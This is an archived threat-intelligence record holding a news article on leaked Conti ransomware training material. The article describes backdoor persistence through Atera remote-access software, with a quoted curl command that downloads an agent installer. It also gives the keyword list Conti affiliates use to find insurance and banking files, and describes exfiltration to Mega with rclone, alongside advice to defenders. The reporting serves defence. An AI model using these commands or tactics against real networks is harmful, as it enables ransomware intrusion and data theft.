{
	"id": "2e79f3d2-48d5-43a6-bcda-3dad50f6c6ea",
	"created_at": "2026-04-06T00:07:30.107828Z",
	"updated_at": "2026-04-10T03:24:23.801799Z",
	"deleted_at": null,
	"sha1_hash": "5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d",
	"title": "Conti ransomware prioritizes revenue and cyberinsurance data theft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1871635,
	"plain_text": "Conti ransomware prioritizes revenue and cyberinsurance data theft\r\nBy Lawrence Abrams\r\nPublished: 2021-08-17 · Archived: 2026-04-05 16:23:25 UTC\r\nTraining material used by Conti ransomware affiliates was leaked online this month, allowing an inside look at how\r\nattackers abuse legitimate software and seek out cyber insurance policies.\r\nEarlier this month, a disgruntled affiliate posted to a hacking forum the IP addresses for Cobalt Strike C2 servers used by the\r\ngang and a 113 MB archive containing training material for conducting ransomware attacks.\r\nForum post from disgruntled affiliate\r\nUsing this leaked training material, security researchers, network admins, and incident responders can better respond to\r\nattacks and quickly find common indicators of compromise (IOCs) used by the ransomware gang.\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/\r\nPage 1 of 5\n\nThis is exactly the case with new research released by Advanced Intel's CEO Vitali Kremez that illustrates how actual Conti\r\nattacks utilized the leaked information.\r\nLegitimate remote access software used as backdoors\r\nAn interesting tactic used by the ransomware gang is using the legitimate Atera remote access software as a backdoor for\r\ncontinued persistence.\r\nWhen conducting an attack, ransomware operations commonly deploy Cobalt Strike beacons that the attackers can use to\r\nexecute commands remotely and gain continued access to a network.\r\nHowever, security software products have become more adept at detecting Cobalt Strike beacons, leading to a loss of access\r\nfor the threat actors.\r\nTo prevent this, Kremez states that the Conti gang is installing the legitimate Atera remote access software on compromised\r\nsystems, which the security software won't detect.\r\nConti ransomware attack flow\r\nSource: Advanced Intel\r\nAtera is a remote management service where you deploy agents to your endpoints so that you can manage them all from a\r\nsingle console. By deploying agents to all compromised devices on a network, the Conti threat actors will gain remote\r\naccess to any device from a single platform.\r\nKremez states that they have seen the following command used by Conti affiliates to install Atera on a compromised device:\r\nshell curl -o setup.msi \"http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1\u0026integratorLogin=REDACTED%40prot\r\n\"In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to\r\nreceive an agent installation script and console access,\" explained Kremez in a blog post about Conti using Atera.\r\nKremez advises admins to use whitelisting tools to block or audit command-line tools such as 'curl' to detect malicious\r\nactivity.\r\n\"Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies\r\nwith the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from\r\nC:\\ProgramData and C:\\Temp directory,\" advises Kremez.\r\nConti targets insurance, banking files\r\nOne of the leaked documents titled 'CobaltStrike MANUAL_V2 .docx' details the specific steps that an affiliate should use\r\nwhen conducting a Conti ransomware attack.\r\nAfter the first stage of the attack, which is to breach the network, gather credentials, and gain control of the Windows\r\ndomain, the threat actors tell their affiliates to start exfiltrating data from the compromised network.\r\nThis stage is essential for the attackers, as files are not only used to scare victims into paying a ransom, but stolen\r\naccounting and insurance policy documents are also used to generate the initial ransom amount and perform negotiations.\r\nWhen first exfiltrating data from the victim's servers, the Conti ransomware gang will specifically look for documents\r\nrelated to the company's financials and whether they have a cybersecurity policy.\r\n\"search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh. especially important, cyber\r\ninsurance, security policy documents,\" reads the translated Conti training document.\r\nIn particular, the threat actors look for the following keywords as part of their first data exfiltration steps:\r\ncyber\r\npolicy\r\ninsurance\r\nendorsement\r\nsupplementary\r\nunderwriting\r\nterms\r\nbank\r\n2020\r\n2021\r\nStatement\r\nThe ransomware gang tells the affiliates to \"prepares datapack right away\" and immediately upload the data to Mega, which\r\nthey used as a hosting platform for the exfiltrated data.\r\nKremez said that the attackers use the legitimate 'rclone' program to upload the data directly to the Mega cloud storage\r\nservice.\r\n\"Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is\r\nestablished. The needed network shares are assigned within the rclone.conf on the victim’s network and a command is\r\nexecuted,\" explains Kremez in a blog post.\r\nKremez states that you should focus on any rclone.exe command run from the C:\\ProgramData and C:\\Temp directories to\r\ndetect data exfiltration attempts.\r\nSource: https://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft/"
	],
	"report_names": [
		"conti-ransomware-prioritizes-revenue-and-cyberinsurance-data-theft"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434050,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.pdf",
		"text": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.txt",
		"img": "https://archive.orkl.eu/5307e80cb2e8f94a3eddc25ff8a4896c4ae3ad6d.jpg"
	}
}